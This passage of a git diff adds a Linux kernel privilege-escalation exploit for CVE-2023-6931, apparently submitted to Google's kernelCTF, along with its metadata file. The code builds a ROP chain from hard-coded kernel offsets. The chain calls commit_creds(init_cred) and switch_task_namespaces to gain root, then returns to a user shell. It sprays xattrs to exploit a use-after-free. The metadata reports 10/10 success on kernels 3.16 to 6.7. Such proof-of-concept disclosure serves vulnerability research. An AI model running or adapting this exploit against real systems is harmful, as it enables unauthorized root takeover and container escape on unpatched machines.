0x2a76900; + uint64_t switch_task_namespaces = kbase + 0x1c5a20; + uint64_t find_task_by_vpid = kbase + 0x1bde50; + uint64_t init_cred = kbase + 0x2a76b40; + uint64_t commit_creds = kbase + 0x1c7590; + uint64_t msleep = kbase + 0x232f10; + uint64_t kpti_trampoline = kbase + 0x1401146; + uint64_t rop[0x100] = {0, }; + + sprintf(y,"uafzzlol%d", 0); + ((uint64_t *)value)[0] = pop_rsp; + ((uint64_t *)value)[1] = xattr + 0x20200; + ((uint64_t *)value)[2] = xattr + 0x20100; + ((uint64_t *)value)[8] = xattr + 0x18000; + ((uint64_t *)value)[9] = xattr + 0x18000; + ((uint64_t *)value)[10] = leakname; + ((uint64_t *)value)[11] = 0x3000; + ((uint64_t *)value)[33] = jmpgadget; + + *(uint64_t *)(value + 0x66) = pop_rsp; + + backup_rv(); + + int ridx = 0; + rop[ridx++] = pop_rdi; + rop[ridx++] = 1; + rop[ridx++] = find_task_by_vpid; + rop[ridx++] = mov_rdi_rax_pop_rbx; + rop[ridx++] = 0; + rop[ridx++] = pop_rsi; + rop[ridx++] = init_nsproxy; + rop[ridx++] = switch_task_namespaces; + rop[ridx++] = pop_rdi; + rop[ridx++] = init_cred; + rop[ridx++] = commit_creds; + rop[ridx++] = kpti_trampoline; + rop[ridx++] = 0; + rop[ridx++] = 0; + rop[ridx++] = (uint64_t)shell; + rop[ridx++] = rv.user_cs; + rop[ridx++] = rv.user_rflags; + rop[ridx++] = rv.user_rsp; + rop[ridx++] = rv.user_ss; + memcpy(value+0x200, rop, 0x100); + + name = gen_xattr_name(XATTR_PREFIX_SECURITY, y); + if(setxattr(fname, name, value, 0x3000, 0) < 0) + perror("setxattr"); + + release_pipe(uafpipe); + + return 0; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-6931_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/metadata.json new file mode 100644 index 00000000..a3421903 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/metadata.json @@ -0,0 +1,21 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp198"], + "vulnerability": { + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=382c27f4ed28f803b1f1473ac2d8db0afc795a1b", + "cve": "CVE-2023-6931", + "affected_versions": ["3.16 - 6.7"], + "requirements": { + "attack_surface": [], + "capabilities": [], + "kernel_config": ["CONFIG_PERF_EVENTS"] + } + }, + "exploits": { + "mitigation-v3b-6.1.55": { + "uses": [], + "requires_separate_kaslr_leak": false, + "stability_notes": "succeeded on 10/10 tries against target instance." + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-6931_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/original.tar.gz new file mode 100644 index 00000000..3e7bebd7 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-6931_mitigation/original.tar.gz differ